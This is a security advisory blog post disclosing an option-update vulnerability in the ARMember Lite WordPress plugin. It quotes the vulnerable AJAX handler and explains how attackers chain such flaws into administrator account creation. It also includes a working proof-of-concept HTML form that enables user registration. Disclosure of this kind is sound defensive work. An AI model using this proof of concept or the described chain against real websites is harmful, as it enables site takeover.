05 Dec

Our Improved Proactive Monitoring Already Caught Another Option Update Related Vulnerability in a WordPress Plugin

Yesterday we noted that our newly improved proactive monitoring of changes being made to WordPress plugins to try to catch serious vulnerabilities when they are introduced in to plugins, which built on code we had developed for our Plugin Security Checker, an automated tool you can use to check if plugins you use contain possible security issues, had already caught a fairly serious vulnerability, one that could leave a website fully disabled. That vulnerability was yet another vulnerability due to insecure usage of the update_option() function that we have found in the wake of one of those being widely exploited. Today that monitoring caught a more serious vulnerability related to that function, since this vulnerability could be use to take full control of websites and while it requires the attacker to logged in to WordPress, the plugin in question, ARMember Lite, is a membership plugin, so it would be on websites that would probably allow for user registration.

This vulnerability is yet another good reason to check plugins you use through our Plugin Security Checker since it would already have notified you of this possible issue. It is flagging a huge amount of other possible security issues in the plugin, so anyone using it that is concerned about security would be best to make sure someone that has the proper skill sets further reviews the plugin and checks if there are other security issues that need to be fixed in the plugin. Paying customers of our service can suggest/vote for plugins to receive a security review from us. We also offer security reviews of a plugin separately from our service.

Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon).

Technical Details

The plugin registers the function arm_update_feature_settings() to be accessible to anyone logged in to WordPress through WordPress’ AJAX functionality:

add_action('wp_ajax_arm_update_feature_settings', array(&$this, 'arm_update_feature_settings'));

In that function, in the file /core/classes/class.arm_global_settings.php, the value of the POST input “arm_features_options” is set to the variable $features_options:

function arm_update_feature_settings() {
	global $wp, $wpdb, $wp_rewrite, $ARMember;
	$response = array('type' => 'error', 'msg' => __('Sorry, Something went wrong. Please try again.', 'ARMember'));
	if (!empty($_POST['arm_features_options'])) {
		$features_options = $_POST['arm_features_options'];

Later in the code the value of the POST input “arm_features_status” is set to the variable $arm_features_status and then both of the variables taken from user input are passed to update_option():

$arm_features_status = (!empty($_POST['arm_features_status'])) ? $_POST['arm_features_status'] : 0;
update_option($features_options, $arm_features_status);

What hackers  have done with this type of vulnerability going back at least a couple of years is to change the WordPress options (settings) to allow user registration (though in the case of website using this plugin that may already been enabled) and set it so new accounts are set to have the Administrator role, which gives new accounts control of the website.

Proof of Concept

The following proof of concept will turn on user registration, when logged in to WordPress.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=arm_update_feature_settings" method="POST">
<input type="hidden" name="arm_features_options" value="users_can_register" />
<input type="hidden" name="arm_features_status" value="1" />
<input type="submit" value="Submit" />

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service you can suggest/vote for the plugins you use to receive a security review from us. You can start using the service for free when you sign up now.